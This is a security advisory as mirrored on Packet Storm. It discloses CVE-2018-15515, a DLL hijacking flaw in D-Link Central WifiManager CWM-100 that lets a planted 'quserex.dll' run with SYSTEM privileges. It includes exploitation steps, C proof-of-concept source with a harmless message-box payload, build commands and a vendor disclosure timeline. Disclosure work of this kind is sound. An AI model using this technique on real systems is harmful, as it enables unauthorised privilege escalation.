Lucene search

K
packetstormHyp3rlinxPACKETSTORM:150244
HistoryNov 09, 2018 - 12:00 a.m.

D-LINK Central WifiManager (CWM 100) 1.03 r0098 DLL Hijacking

2018-11-0900:00:00
hyp3rlinx
packetstormsecurity.com
324

0.0005 Low

EPSS

Percentile

18.9%

`[+] Credits: John Page (aka hyp3rlinx)   
[+] Website: hyp3rlinx.altervista.org  
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt  
[+] ISR: ApparitionSec   
  
  
***Greetz: indoushka | Eduardo B.***  
  
  
  
[Vendor]  
us.dlink.com  
  
  
[Product]  
D-LINK Central WifiManager (CWM 100)  
Version 1.03 r0098  
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/  
  
D-Links free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.  
  
  
[Vulnerability Type]  
Trojan File SYSTEM Privilege Escalation  
  
  
[Affected Component]  
"quserex.dll"  
  
  
[CVE Reference]  
CVE-2018-15515  
  
  
[Security Issue]  
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.  
  
  
[Impact]  
Code Execution as SYSTEM  
  
  
[Exploit/POC]  
1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe" directory under the DLINK directory  
  
2) Restart the service "CaptivelPortal"  
  
3) Proof, examine using process monitor (sysinternals)  
  
  
#include <windows.h>  
  
/* hyp3rlinx */  
  
/*  
gcc -c -m32 quserex.c  
gcc -shared -m32 -o quserex.dll quserex.o  
*/  
  
void executo(){  
MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){  
switch(fdwReason){  
case DLL_PROCESS_ATTACH:{  
executo();  
break;  
}  
case DLL_PROCESS_DETACH:{  
executo();  
break;  
}  
case DLL_THREAD_ATTACH:{  
executo();  
break;  
}  
case DLL_THREAD_DETACH:{  
executo();  
break;  
}  
}  
return TRUE;  
}  
  
  
  
[Network Access]  
Local  
  
  
  
[Severity]  
High  
  
  
  
[Disclosure Timeline]  
Vendor Notification: August 8, 2018  
Vendor acknowledgement: August 8, 2018  
CVE assigned Mitre: August 18, 2018  
Request update: August 31, 2018  
No reply from vendor  
Request update: September 6, 2018  
Vendor: "R&D has begun this month to patch your report." : September 12, 2018  
Request update: October 3, 2018  
Vendor: "will release a new beta for QA verification by end of this month 10'2018."  
Request update: October 16, 2018  
no reply from vendor  
Request update: October 23, 2018  
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018  
Inform vendor of disclosure by November 8, 2018 : October 31, 2018  
No reply from vendor  
November 8, 2018 : Public Disclosure  
  
  
  
[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).  
  
hyp3rlinx  
`

0.0005 Low

EPSS

Percentile

18.9%

Related for PACKETSTORM:150244